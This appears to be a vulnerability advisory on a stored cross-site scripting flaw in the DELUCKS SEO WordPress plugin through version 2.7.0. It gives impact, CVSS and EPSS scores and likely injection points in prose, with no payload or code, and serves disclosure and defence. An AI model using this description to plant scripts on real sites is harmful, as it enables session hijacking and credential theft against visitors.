Stored Cross‑Site Scripting (XSS) occurs when user input is not properly neutralized before being saved and later displayed in web pages, allowing attackers to inject malicious scripts. In this case, the DELUCKS SEO plugin fails to escape data persisted by the plugin, enabling stored XSS. An attacker who can submit input to the plugin can have the malicious script executed in the browsers of any site visitor, leading to possible session hijacking, credential theft, defacement, or delivery of further malware. This weakness corresponds to CWE‑79.

Any installation of the DELUCKS SEO plugin, regardless of the surrounding WordPress version, up to and including version 2.7.0, is affected. The issue is documented for all versions from the plugin’s earliest release through 2.7.0.

The CVSS base score of 6.5 indicates a moderate risk to confidentiality, integrity, and availability. The EPSS score of less than 1% suggests that actual exploitation attempts are currently rare, and the vulnerability is not listed in the CISA KEV catalog. Likely attack paths involve entering malicious payloads through the plugin’s administrative settings or data entry fields, which are then rendered without escaping when the content is displayed on the front‑end. Because the flaw is stored, an attacker can maintain persistence until the affected content is viewed by end users. Detection would rely on monitoring for unusual script injections or anomalous behavior in visitors’ browsers.